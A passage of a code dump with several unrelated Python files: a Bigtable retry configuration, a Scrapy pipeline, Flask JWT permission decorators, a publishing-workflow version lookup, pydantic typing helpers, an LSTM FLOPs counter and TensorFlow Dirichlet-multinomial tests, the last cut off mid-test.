ext | sha | content
---|---|---|
py | 1a3f59a06023580cd1bde994bfa030ba983f7c85 | config = {
"interfaces": {
"google.bigtable.admin.v2.BigtableTableAdmin": {
"retry_codes": {
"idempotent": ["DEADLINE_EXCEEDED", "UNAVAILABLE"],
"non_idempotent": [],
},
"retry_params": {
"idempotent_params": {
"initial_retry_delay_millis": 1000,
"retry_delay_multiplier": 2.0,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 60000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 60000,
"total_timeout_millis": 600000,
},
"non_idempotent_params": {
"initial_retry_delay_millis": 0,
"retry_delay_multiplier": 1.0,
"max_retry_delay_millis": 0,
"initial_rpc_timeout_millis": 60000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 60000,
"total_timeout_millis": 60000,
},
"non_idempotent_heavy_params": {
"initial_retry_delay_millis": 0,
"retry_delay_multiplier": 1.0,
"max_retry_delay_millis": 0,
"initial_rpc_timeout_millis": 300000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 300000,
"total_timeout_millis": 300000,
},
"drop_row_range_params": {
"initial_retry_delay_millis": 0,
"retry_delay_multiplier": 1.0,
"max_retry_delay_millis": 0,
"initial_rpc_timeout_millis": 3600000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 3600000,
"total_timeout_millis": 3600000,
},
},
"methods": {
"CreateTable": {
"timeout_millis": 130000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "non_idempotent_heavy_params",
},
"CreateTableFromSnapshot": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "non_idempotent_params",
},
"ListTables": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "idempotent_params",
},
"GetTable": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "idempotent_params",
},
"DeleteTable": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "non_idempotent_params",
},
"ModifyColumnFamilies": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "non_idempotent_heavy_params",
},
"DropRowRange": {
"timeout_millis": 900000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "drop_row_range_params",
},
"GenerateConsistencyToken": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "idempotent_params",
},
"CheckConsistency": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "idempotent_params",
},
"SnapshotTable": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "non_idempotent_params",
},
"GetSnapshot": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "idempotent_params",
},
"ListSnapshots": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "idempotent_params",
},
"DeleteSnapshot": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "non_idempotent_params",
},
},
}
}
}
|
py | 1a3f5bb7959fd0eac7bd782d6094cdebbbfa491e |
"""contains custom scrapy pipeline."""
class IndexPipeline(object):
"""This class renames _index field."""
def process_item(self, item, spider):
"""implements https://doc.scrapy.org/en/latest/topics/item-pipeline.html#process_item"""
if item.get('_index'):
item['self'] = item.pop('_index')
return item
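# A minimal usage sketch (not part of the original project): pipelines only run when
# registered in the Scrapy settings, so something like the following would be needed.
# The dotted path "myproject.pipelines.IndexPipeline" is a hypothetical module location.
#
# ITEM_PIPELINES = {
#     "myproject.pipelines.IndexPipeline": 300,
# }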
|
py | 1a3f5bb9dfa3906b20bfaf53b63f5dfc5214dfef | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from functools import wraps
from werkzeug.exceptions import Forbidden
from .models import *
# from flask_jwt_extended.view_decorators import _decode_jwt_from_request
from flask_jwt_extended import verify_jwt_in_request, get_jwt_claims
from lgw import lxd_api_get
def import_user():
"""
Get user identity from json web token
:return: current_identity
"""
try:
from flask_jwt_extended import get_jwt_identity
current_identity = User.query.get(int(get_jwt_identity()))
return current_identity
except ImportError:
raise ImportError(
'User argument not passed')
def populate_instances_table():
"""
Search for new or deleted instances and update their status in local database
"""
database_lxdservers_list = Server.query.all()
for lxdserver in database_lxdservers_list:
instance_names = []
try:
res = lxd_api_get(lxdserver, 'instances')
for c in res.json()['metadata']:
instance_names.append(c[15:]) # strip the '/1.0/instances/' prefix to get the instance name
except Exception as e:
print(e)
current_instances_list = tuple(instance_names)
database_instances_list = Instance.query.filter_by(location=lxdserver.name)
database_instances_list_names = [str(i.name) for i in database_instances_list]
# Removing old instances from database
for inst in database_instances_list:
if inst.name not in current_instances_list:
db.session.delete(inst)
db.session.commit()
if len(inst.servers) == 0:
db.session.delete(inst)
db.session.commit()
# Adding new instances to database
for cinst in current_instances_list:
if cinst not in database_instances_list_names:
instance = Instance()
instance.name = cinst
instance.location = lxdserver.name
db.session.add(instance)
db.session.commit()
lxdserver.instances.append(instance.id)
db.session.commit()
db.session.commit()
def user_has(ability, get_user=import_user):
"""
Takes an ability (the string name of either a role or an ability) and only runs the wrapped function if the current user has that ability (or is an admin)
:param ability:
:param get_user:
:return: wrapper:
"""
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
desired_ability = Ability.query.filter_by(
name=ability).first()
user_abilities = []
current_identity = get_user()
for group in current_identity._groups:
user_abilities += group.abilities
if current_identity.admin or desired_ability.id in user_abilities:
return func(*args, **kwargs)
else:
raise Forbidden("You do not have access")
return inner
return wrapper
def otp_confirmed(fn):
"""
If you decorate a view with this, it will ensure that the requester has a
valid JWT before calling the actual view, and that the OTP is confirmed.
:param fn: The view function to decorate
"""
@wraps(fn)
def wrapper(*args, **kwargs):
# jwt_data = _decode_jwt_from_request(request_type='access')
# print(jwt_data)
verify_jwt_in_request()
claims = get_jwt_claims()
if claims['otp_confirmed'] == False:
raise Forbidden("You do not have access")
else:
return fn(*args, **kwargs)
return wrapper
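# Minimal usage sketch (assumption: the blueprint, route and ability string below are
# hypothetical, not from the original project). Both decorators wrap an ordinary Flask
# view: otp_confirmed verifies the JWT and its otp_confirmed claim first, then
# user_has checks the group abilities of the identified user.
#
# from flask import Blueprint, jsonify
#
# api = Blueprint("api", __name__)
#
# @api.route("/api/v1/instances", methods=["GET"])
# @otp_confirmed
# @user_has("instances_infos_all")
# def instances_list():
#     return jsonify([i.name for i in Instance.query.all()])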
|
py | 1a3f5cf9398dd57b057b3a2baac9edccc09abdf9 | from S3utility.s3_notification_info import S3NotificationInfo
from provider.execution_context import get_session
from provider.article_structure import ArticleInfo
import provider.lax_provider
from activity.objects import Activity
lookup_functions = {
"article_next_version": provider.lax_provider.article_next_version,
"article_highest_version": provider.lax_provider.article_highest_version,
}
class activity_VersionLookup(Activity):
def __init__(self, settings, logger, conn=None, token=None, activity_task=None):
super(activity_VersionLookup, self).__init__(
settings, logger, conn, token, activity_task
)
self.name = "VersionLookup"
self.pretty_name = "Version Lookup"
self.version = "1"
self.default_task_heartbeat_timeout = 30
self.default_task_schedule_to_close_timeout = 60 * 5
self.default_task_schedule_to_start_timeout = 30
self.default_task_start_to_close_timeout = 60 * 5
self.description = (
"Looks up version on Lax endpoints and stores version in session"
)
self.logger = logger
def do_activity(self, data=None):
try:
info = S3NotificationInfo.from_dict(data)
filename = info.file_name[info.file_name.rfind("/") + 1 :]
run = data["run"]
session = get_session(self.settings, data, run)
session.store_value("filename_last_element", filename)
session.store_value("run_type", data.get("run_type"))
article_structure = ArticleInfo(filename)
if article_structure.article_id is None:
self.logger.error(
"Name '%s' did not match expected pattern for article id" % filename
)
raise RuntimeError(
"article_structure.article_id is None. File pattern problem."
)
version = self.get_version(
self.settings, article_structure, data["version_lookup_function"]
)
session.store_value("version", version)
article_id = str(int(article_structure.article_id))
session.store_value("article_id", article_id)
self.emit_monitor_event(
self.settings,
article_id,
version,
data["run"],
self.pretty_name,
"start",
" ".join(
("Version Lookup for article", article_id, "version:", version)
),
)
self.set_monitor_property(
self.settings, article_id, "article-id", article_id, "text"
)
self.set_monitor_property(
self.settings,
article_id,
"publication-status",
"publication in progress",
"text",
version=version,
)
self.emit_monitor_event(
self.settings,
article_structure.article_id,
version,
data["run"],
self.pretty_name,
"end",
" ".join(
(
"Finished Version Lookup for article",
article_structure.article_id,
"version:",
version,
)
),
)
return self.ACTIVITY_SUCCESS
except Exception as exception:
self.logger.exception(
"Exception when trying to Lookup Version. Error: " + str(exception)
)
return self.ACTIVITY_PERMANENT_FAILURE
def get_version(self, settings, article_structure, lookup_function):
try:
version = article_structure.get_version_from_zip_filename()
if version is None:
return str(
execute_function(
lookup_functions[lookup_function],
article_structure.article_id,
settings,
)
)
return version
except Exception:
self.logger.exception("Exception on function `get_version`")
raise
def execute_function(the_function, arg1, arg2):
return the_function(arg1, arg2)
|
py | 1a3f5e2b8f8af810eb58d382a73ae154256ac03f | """
Custom typing extension.
Classes:
ConstantHolder: Base class for storing constants and avoiding hard-coded values everywhere.
SaveableBaseModel: Child class of pydantic.BaseModel which enables saving and loading that BaseModel.
TypedNamedTuple: Child class of pydantic.BaseModel, can be used similarly to a NamedTuple and has some
tensor handling utilities.
ConfigClass: Base class for storing configuration fields that appear in the configuration YAML files.
"""
from __future__ import annotations
import inspect
import json
from collections.abc import Iterable, Mapping
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple, Union, cast
import numpy as np
import torch as th
from pydantic import BaseModel
INF = 32752 # infinity expressed in float16, this is large enough s.t. exp(-INF) == 0
TENSOR_TYPES = (th.Tensor, np.ndarray)
class ConfigClass:
"""
Base class for config storage classes. Defines representation for printing.
"""
def __repr__(self) -> str:
"""
Represent class attributes as key, value pairs.
Returns:
String representation of the config.
"""
str_repr = ["", "-" * 10 + " " + type(self).__name__]
for key, value in vars(self).items():
if key in ["config_orig"]:
continue
if isinstance(value, ConfigClass):
# str_repr += ["-" * 10 + " " + key, str(value)]
str_repr += [str(value)]
else:
str_repr += [f" {key} = {value}"]
return "\n".join(str_repr)
# ---------- SaveableBaseModel: Class for modeling and storing states. ----------
class SaveableBaseModel(BaseModel):
"""
Saveable version of pydantic BaseModel class.
"""
def save(self, file: Union[str, Path]) -> None:
"""
Save the model.
Args:
file: Target json file.
"""
try:
json.dump(self.dict(), Path(file).open("wt", encoding="utf8"))
except TypeError as e:
# something in the object is probably not JSON serializable.
print("---------- JSON encoding error! ----------")
for key, val in self.dict().items():
print(f"{key}: {type(val)}")
raise TypeError(f"See console output. JSON save to {file} failed.") from e
def load(self, file: Union[str, Path]) -> SaveableBaseModel:
"""
Load model values from file.
Args:
file: Source json file.
Returns:
Class instance with values set from the file.
"""
for key, val in json.load(Path(file).open("rt", encoding="utf8")).items():
self.__setattr__(key, val)
return self
@classmethod
def create_from_file(cls, file: Union[str, Path]) -> SaveableBaseModel:
"""
Instantiate model from file.
Args:
file: Source json file.
Returns:
Class instance with values set from the file.
"""
return cls(**json.load(Path(file).open("rt", encoding="utf8")))
class Config:
# configure pydantic.BaseModel to fail on assigning wrongly typed values
validate_assignment = True
# ---------- TypedNamedTuple: Class for explicit data modeling. ----------
def _nested_shape_check(field_name: str, tensor_container: Any, shape: List[Optional[int]]) -> None:
"""
Check if input tensor matches the given shape. If input is iterable or mapping, recurse into it and check
if all contained tensors match the given shape.
Args:
field_name: Used to give a more verbose error.
tensor_container: Input tensor or container of tensors.
shape: Target shape to check.
Raises:
AssertionError (wrong shape), TypeError (wrong input type)
"""
if isinstance(tensor_container, TENSOR_TYPES):
value_shape = tensor_container.shape
err_msg = f"Shape mismatch, input {value_shape} defined {shape} on field {field_name}"
# check same number of dimensions
assert len(value_shape) == len(shape), err_msg
# check each dimension
for s1, s2 in zip(value_shape, shape):
# either target shape is arbitrary (None) or it matches input shape
assert s2 is None or s1 == s2, err_msg
elif isinstance(tensor_container, Mapping):
# check mappings before generic iterables, otherwise dicts would be iterated over their keys
for _, tensor_subcontainer in tensor_container.items():
_nested_shape_check(field_name, tensor_subcontainer, shape)
elif isinstance(tensor_container, Iterable):
for tensor_subcontainer in tensor_container:
_nested_shape_check(field_name, tensor_subcontainer, shape)
else:
raise TypeError(f"Tensor shape check on class {type(tensor_container)} not supported, field {field_name}.")
class TypedNamedTuple(BaseModel):
"""
Behaves similar to NamedTuple. Includes type and shape validation.
Notes:
Implementation of pydantic BaseModel that can be instantiated with args instead of kwargs
Define class field _shape_dict to check shapes.
Args:
*args: Values for the model with same order as defined.
Examples:
>>> class ExampleTuple(TypedNamedTuple):
>>> key: str
>>> data: th.Tensor
>>> # shape check: first dimension arbitrary, second must match exactly
>>> _shapes_dict = {"data": (None, 6)}
>>> t = ExampleTuple("key", th.zeros(4, 6))
>>> t.key # access with field attribute
>>> t.dict()["key"] # access like a dict
>>> t.tuple()[0] # access like a tuple
"""
_shapes_dict: Dict[str, List[Optional[int]]] = {}
def __init__(self, *args, **kwargs):
assert len(args) <= len(self.__fields__), (f"Too many ({len(args)}) arguments "
f"for class {self.__class__.__name__}")
if len(args) > 0:
# fill the kwargs dict with (name, value) entries from args
for (field, _model_field), arg in zip(self.__fields__.items(), args):
assert field not in kwargs, f"Duplicate argument '{field}' for class {self.__class__.__name__}."
kwargs[field] = arg
# instantiate the model with that dict
super().__init__(**kwargs)
self.validate_shapes()
def __len__(self) -> int:
"""
Convenience function: length of the tuple
Returns:
Length.
"""
return len(self.__fields__)
def tuple(self) -> Tuple[Any]:
"""
Access the model values as tuple.
Returns:
Model values as tuple.
"""
return tuple(self.dict().values())
def dict(self, **kwargs) -> Dict[str, Any]: # pylint: disable=useless-super-delegation
"""
Overwrite this function for proper type hints.
Returns:
Model fields and values as dict.
"""
return super().dict(**kwargs)
def keys(self) -> List[str]:
"""
Get the model field names.
Returns:
Field names.
"""
return self.dict().keys()
def items(self) -> List[Tuple[str, Any]]:
"""
Get the model fields as (name, value) pairs.
Returns:
Field name and value pairs.
"""
return self.dict().items()
def values(self) -> List[Any]:
"""
Return the model field values.
Returns:
Field values.
"""
return self.dict().values()
def validate_shapes(self):
"""
Use class field _shapes_dict to check if input tensors match the target shapes.
Returns:
"""
# loop all defined shapes
for key, shape in self._shapes_dict.items():
# get the field value with defined name
value = self.dict()[key]
# compare to target shape
_nested_shape_check(key, value, shape)
def to_cuda(self, *, non_blocking: bool = True) -> None:
"""
Convenience function: Move all tensors in the model to cuda.
Args:
non_blocking: Some PyTorch internal parameter, has something to do with pin_memory in dataloader.
Usually shouldn't hurt to keep it at True.
"""
# loop all tensors in the model
for name, value in self.dict().items():
if isinstance(value, th.Tensor):
# update pydantic BaseModel with setattr
setattr(self, name, value.cuda(non_blocking=non_blocking))
class Config:
# allow torch tensors etc.
arbitrary_types_allowed = True
# ---------- ConstantHolder: Container for constants ----------
class _StringRepr(type):
"""
Metaclass for overwriting result of str(Class).
"""
def __str__(cls) -> str:
"""
When calling str(Class), call Class._get_string_repr method.
Returns:
Custom class string representation.
"""
return cls._get_string_repr() # pylint: disable=no-value-for-parameter
def _get_string_repr(cls) -> str:
"""
Override this to return string representation of the class.
Returns:
Class representation as string.
"""
raise NotImplementedError
class ConstantHolder(metaclass=_StringRepr):
"""
Class to hold constants. Attributes must be uppercase. Cannot be instantiated.
Notes:
There is some magic happening here:
The properties of this base class (_keys, _values, _dict) will hold all constants including those of inherited
classes. The interface will then dynamically return the correct things given the current cls.__name__.
Examples:
Subclass ConstantHolder and set constants as class attributes.
Set allowed_types to a single type or list of types to type-check the values.
>>> class MyConstants(ConstantHolder, allowed_types=str):
>>> FIELD = "value"
Methods:
keys: Get list of constant keys.
values: Get list of constant values.
items: Get list of constant key/value tuples.
dict: Get dictionary of constant key/value pairs.
get: Get value given key, error if not found.
get_safe: Get value given key, return default if not found.
check_has_key: Returns bool whether or not the key is in the class.
assert_has_key: Raise error if the key is not found.
check_has_value: Returns bool whether or not the value is in the class.
assert_has_value: Raise error if the value is not found.
Notes:
Public interface: Methods keys, values, items, dict, get. Supports __getitem__ syntax (using []).
This class is introduced because enum.Enum has lots of unnecessary restrictions and is clumsy to use.
Public methods resemble those of a dict but return lists, not e.g. instances of dict_keys.
"""
# create the class properties with empty entries for the root parent
_keys: Dict[str, List[str]] = {"ConstantHolder": []}
_values: Dict[str, List[Any]] = {"ConstantHolder": []}
_dict: Dict[str, Dict[str, Any]] = {"ConstantHolder": {}}
# ---------- Public interface ----------
@classmethod
def keys(cls) -> List[str]:
"""
Get list of constant keys.
Returns:
Constant keys.
"""
return cls._keys[cls.__name__]
@classmethod
def values(cls) -> List[Any]:
"""
Return constant values.
Returns:
Constant values.
"""
return cls._values[cls.__name__]
@classmethod
def dict(cls) -> Dict[str, Any]:
"""
Return constant key-value pairs as dict.
Returns:
Constant keys.
"""
return cls._dict[cls.__name__]
@classmethod
def items(cls) -> List[Tuple[str, Any]]:
"""
Return constant key-value pairs as list of tuples like dict items.
Returns:
Constant keys.
"""
return list(zip(cls._keys[cls.__name__], cls._values[cls.__name__]))
@classmethod
def get(cls, key: str) -> Any:
"""
Get constant value given the key. Raise error if not found.
Args:
key: Constant key.
Returns:
Constant value.
"""
if key not in cls.keys():
raise IndexError(f"No key: {key} in {cls}")
return cast(Any, getattr(cls, key))
@classmethod
def get_safe(cls, key: str, default: Optional[Any] = None) -> Optional[Any]:
"""
Get constant value given the key. Return default if not found.
Args:
key: Constant key.
default: Value to return if key is not found, default None.
Returns:
Constant value or default.
"""
if key not in cls.keys():
return default
return cls.get(key)
@classmethod
def check_has_key(cls, key: str) -> bool:
"""
Check if the key is in the class.
Args:
key: Constant key.
Returns:
Whether or not the key is defined in the class.
"""
return key in cls.keys()
@classmethod
def assert_has_key(cls, key: str) -> None:
"""
Throw error if the key is not found in the class.
Args:
key: Constant key.
"""
assert cls.check_has_key(key), f"Key not found: {key} in {cls}"
@classmethod
def check_has_value(cls, value: Any) -> bool:
"""
Check if the value is in the class.
Args:
value: Constant value.
Returns:
Whether or not the key is defined in the class.
"""
return value in cls.values()
@classmethod
def assert_has_value(cls, value: str) -> None:
"""
Throw error if the value is not found in the class.
Args:
value: Constant value.
"""
assert cls.check_has_value(value), f"Value not found: {value} in {cls}"
# ---------- Private setup methods ----------
@classmethod
def _get_string_repr(cls) -> str:
"""
Return class name and content as string for better error messages.
Returns:
String representation.
"""
return f"ConstantHolder {cls.__name__}: {cls.items()}"
@classmethod
def __init_subclass__(cls, allowed_types: Optional[Union[type, List[type], Tuple[type, ...]]] = None) -> None:
"""
Setup properties for the public interface when this class is inherited.
This will be called on nested inheritance as well.
Args:
allowed_types: Optionally specify a type or list of types that are allowed for values.
By default all values are allowed.
"""
cls._keys[cls.__name__] = []
cls._values[cls.__name__] = []
cls._dict[cls.__name__] = {}
# add parent fields
for parent_cls in cls.__bases__:
cls._keys[cls.__name__] += cls._keys[parent_cls.__name__]
cls._values[cls.__name__] += cls._values[parent_cls.__name__]
cls._dict[cls.__name__].update(cls._dict[parent_cls.__name__])
# loop attributes, check correctness and extend the parent's class properties _keys, _values, _dict.
for key in cls.__dict__:
# ignore non-public fields
if key[0] == "_":
continue
# get the value of the constant
value = getattr(cls, key)
# ignore classmethods
if inspect.ismethod(value) and value.__self__ is cls:
continue
# make sure all constants are uppercase
assert key == key.upper(), f"Constant: {key} in class: {cls.__name__} must be uppercase."
# if allowed types is specified, make sure the value types are allowed
if allowed_types is not None:
# isinstance errors when fed lists instead of tuple, so convert lists to tuples
if isinstance(allowed_types, list):
allowed_types = tuple(allowed_types)
assert isinstance(value, allowed_types), (
f"Constant: {key} in class: {cls.__name__} must be of type {allowed_types}")
# update class properties
cls._keys[cls.__name__].append(key)
cls._values[cls.__name__].append(value)
cls._dict[cls.__name__][key] = value
def __init__(self) -> None:
"""
Raise error when trying to instance a ConstantHolder class.
"""
raise RuntimeError(f"Do not instance this class, it's a ConstantHolder: {type(self).__name__}")
|
py | 1a3f5e3c3e6fe43430f4f4ccb0115af9c5349604 | ################################################################################
# [VMLMF] Lowrank Matrix Factorization with Vector-Multiplication
# Project: Starlab
#
# Authors: Hyojin Jeon ([email protected]), Seoul National University
# U Kang ([email protected]), Seoul National University
#
# File: compression_cal.py
# - utilities for analyze compression results of VMLMF
#
# Version : 1.0
# Date : Oct 14, 2021
# Main Contact: Hyojin Jeon
#
# This software is free of charge under research purposes.
# For commercial purposes, please contact the authors.
#
################################################################################
# pylint: disable=C0103, E1101, C0114, R0902,C0116, R0914, R0913, C0123, W0613, W0102,C0413, E0401,R1719
"""
====================================
:mod:`compression_cal`
====================================
.. moduleauthor:: Hyojin Jeon <[email protected]>
Description
===========
Module for computing the number of parameters and FLOPs of a model.
"""
import sys
sys.path.append('../')
def print_model_parm_nums(model):
"""print the number of parameters of the model
:param model: model to count parameters
"""
modelparams=sum(p.numel() for p in model.parameters())
print(f" + Number of params:{(modelparams/1e3):.2f}K")
def print_model_parm_flops(model,seq_len,args,modeltype="vmmodel"):
"""print FLOPs of the model
:param model: model to count FLOPs
:param seq_len: integer sequence length of the input data
:param args: parsed command-line arguments supplied by the user
:param modeltype: string type of the model
"""
if modeltype in ['vmlmf_group','vmlmf_lm']:
print("Not Implemented")
return
batch_size=args.batch_size
modeltype=args.model.lower() if modeltype != "mylstm" else "mylstm"
total_ops=count_lstm(model,seq_len,batch_size,modeltype)
total_ops+=count_linear(model,18) # in_features and out_features of the final linear layer
print(f" + Number of FLOPs: {(total_ops / 1e6):.2f}M")
print(total_ops)
def print_model_parm_names(model):
"""print the name of parameters of the model
:param model: model to get parameters
"""
for idx,m in enumerate(model.modules()):
print( idx, '->', m )
print("Model's state_dict:")
for param_tensor in model.state_dict():
print(param_tensor, "\t", model.state_dict()[param_tensor].size())
def _count_lstm_cell(modeltype,input_size,hidden_size,wRank=None,uRank=None,bias=True):
"""count FLOPs of lstm/vmlmf cell
:param modeltype: string modeltype
:param input_size: integer input size of the model
:param hidden_size: integer hidden layer size of the model
:param wRank: input to hidden matrix rank of vmlmf
:param uRank: hidden to hidden matrix rank of vmlmf
:param bias: whether the model shares a bias across the four gates
:returns: FLOPs of a cell
"""
total_ops=0
isvmmodel = modeltype != "mylstm"
#vector-vector multiplication
input_dia_ops = input_size
hidden_dia_ops = hidden_size
#subtract vec elem
input_addition = hidden_addition = 0
if wRank is not None:
input_addition = (2*wRank-1)*input_size + hidden_size
if uRank is not None:
hidden_addition = (2*uRank-1)*hidden_size + hidden_size
input_ops=(2*input_size-1)*wRank+(2*wRank-1)*hidden_size \
if isvmmodel else (2*input_size-1)*hidden_size
hidden_ops=(2*hidden_size-1)*uRank+(2*uRank-1)*hidden_size\
if isvmmodel else (2*hidden_size-1)*hidden_size
state_ops=input_ops+hidden_ops + input_dia_ops + hidden_dia_ops +hidden_size*3 \
+input_addition + hidden_addition if isvmmodel else input_ops + hidden_ops + hidden_size
if bias:
state_ops+=hidden_size
total_ops+=state_ops*4
#hadamard addition (f*c + i*g )
total_ops+=hidden_size*3
#h'=o*tanh(c')
total_ops+=hidden_size
return total_ops
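# Worked example (illustrative numbers, not from the original code): for the plain LSTM
# branch ("mylstm") with input_size=4 and hidden_size=2, per gate
#   input_ops  = (2*4-1)*2 = 14,  hidden_ops = (2*2-1)*2 = 6,
#   state_ops  = 14 + 6 + 2 (elementwise add) + 2 (bias) = 24,
# so the cell costs 24*4 + 2*3 (gate hadamards) + 2 (o*tanh(c')) = 104 FLOPs per
# timestep and per sample, i.e. _count_lstm_cell("mylstm", 4, 2) == 104.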
def count_lstm(model,seq_len,batch_size,modeltype):
"""count FLOPs of lstm/vmlmf layer
:param model: model object
:param seq_len: integer sequence length of the input data
:param batch_size: integer batch_size of the input data
:param modeltype: type of the model
:returns: FLOPs of LSTM model
"""
if modeltype in ['vmlmf_group','vmlmf_lm']:
print("Not Implemented")
return None
total_ops=0
total_ops+=_count_lstm_cell(modeltype,model.rnn.input_size,\
model.rnn.hidden_layer_sizes[0],model.rnn.w_rank,model.rnn.u_ranks,bias=True)
for i in range(len(model.rnn.hidden_layer_sizes)-1):
total_ops+=_count_lstm_cell(modeltype,model.rnn.hidden_layer_sizes[i],\
model.rnn.hidden_layer_sizes[i+1],model.rnn.w_rank,model.rnn.u_ranks,bias=True)
total_ops*=seq_len
total_ops*=batch_size
return total_ops
def count_linear(model,output_size):
"""count FLOPs of linear layer
:param model: model object
:param output_size: integer output size of the model
:returns: FLOPs of linear layer
"""
input_size=model.rnn.hidden_layer_sizes[-1]
return input_size*output_size*2
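# Worked example (assumption: the last recurrent layer has 128 hidden units; the output
# size 18 matches the hard-coded value used in print_model_parm_flops above):
# count_linear(model, 18) == 128 * 18 * 2 == 4608 FLOPs for the final linear layer.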
|
py | 1a3f5eaf66c302895efb651ebec57410469f701c | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
class DirichletMultinomialTest(tf.test.TestCase):
def testSimpleShapes(self):
with self.test_session():
alpha = np.random.rand(3)
dist = tf.contrib.distributions.DirichletMultinomial(1., alpha)
self.assertEqual(3, dist.event_shape().eval())
self.assertAllEqual([], dist.batch_shape().eval())
self.assertEqual(tf.TensorShape([3]), dist.get_event_shape())
self.assertEqual(tf.TensorShape([]), dist.get_batch_shape())
def testComplexShapes(self):
with self.test_session():
alpha = np.random.rand(3, 2, 2)
n = [[3., 2], [4, 5], [6, 7]]
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
self.assertEqual(2, dist.event_shape().eval())
self.assertAllEqual([3, 2], dist.batch_shape().eval())
self.assertEqual(tf.TensorShape([2]), dist.get_event_shape())
self.assertEqual(tf.TensorShape([3, 2]), dist.get_batch_shape())
def testNproperty(self):
alpha = [[1., 2, 3]]
n = [[5.]]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
self.assertEqual([1, 1], dist.n.get_shape())
self.assertAllClose(n, dist.n.eval())
def testAlphaProperty(self):
alpha = [[1., 2, 3]]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(1, alpha)
self.assertEqual([1, 3], dist.alpha.get_shape())
self.assertAllClose(alpha, dist.alpha.eval())
def testPmfNandCountsAgree(self):
alpha = [[1., 2, 3]]
n = [[5.]]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
dist.pmf([2., 3, 0]).eval()
dist.pmf([3., 0, 2]).eval()
with self.assertRaisesOpError('Condition x >= 0.*'):
dist.pmf([-1., 4, 2]).eval()
with self.assertRaisesOpError('Condition x == y.*'):
dist.pmf([3., 3, 0]).eval()
def testPmf_non_integer_counts(self):
alpha = [[1., 2, 3]]
n = [[5.]]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
dist.pmf([2., 3, 0]).eval()
dist.pmf([3., 0, 2]).eval()
dist.pmf([3.0, 0, 2.0]).eval()
# Both equality and integer checking fail.
with self.assertRaisesOpError('Condition x == y.*'):
dist.pmf([1.0, 2.5, 1.5]).eval()
dist = tf.contrib.distributions.DirichletMultinomial(
n, alpha, validate_args=False)
dist.pmf([1., 2., 3.]).eval()
# Non-integer arguments work.
dist.pmf([1.0, 2.5, 1.5]).eval()
def testPmfBothZeroBatches(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
with self.test_session():
# Both zero-batches. No broadcast
alpha = [1., 2]
counts = [1., 0]
dist = tf.contrib.distributions.DirichletMultinomial(1., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(1 / 3., pmf.eval())
self.assertEqual((), pmf.get_shape())
def testPmfBothZeroBatchesNontrivialN(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
with self.test_session():
# Both zero-batches. No broadcast
alpha = [1., 2]
counts = [3., 2]
dist = tf.contrib.distributions.DirichletMultinomial(5., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(1 / 7., pmf.eval())
self.assertEqual((), pmf.get_shape())
def testPmfBothZeroBatchesMultidimensionalN(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
with self.test_session():
alpha = [1., 2]
counts = [3., 2]
n = np.full([4, 3], 5., dtype=np.float32)
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
pmf = dist.pmf(counts)
self.assertAllClose([[1 / 7., 1 / 7., 1 / 7.]] * 4, pmf.eval())
self.assertEqual((4, 3), pmf.get_shape())
def testPmfAlphaStretchedInBroadcastWhenSameRank(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
with self.test_session():
alpha = [[1., 2]]
counts = [[1., 0], [0., 1]]
dist = tf.contrib.distributions.DirichletMultinomial([1.], alpha)
pmf = dist.pmf(counts)
self.assertAllClose([1 / 3., 2 / 3.], pmf.eval())
self.assertEqual((2), pmf.get_shape())
def testPmfAlphaStretchedInBroadcastWhenLowerRank(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
with self.test_session():
alpha = [1., 2]
counts = [[1., 0], [0., 1]]
pmf = tf.contrib.distributions.DirichletMultinomial(1., alpha).pmf(counts)
self.assertAllClose([1 / 3., 2 / 3.], pmf.eval())
self.assertEqual((2), pmf.get_shape())
def testPmfCountsStretchedInBroadcastWhenSameRank(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
with self.test_session():
alpha = [[1., 2], [2., 3]]
counts = [[1., 0]]
pmf = tf.contrib.distributions.DirichletMultinomial(
[1., 1.], alpha).pmf(counts)
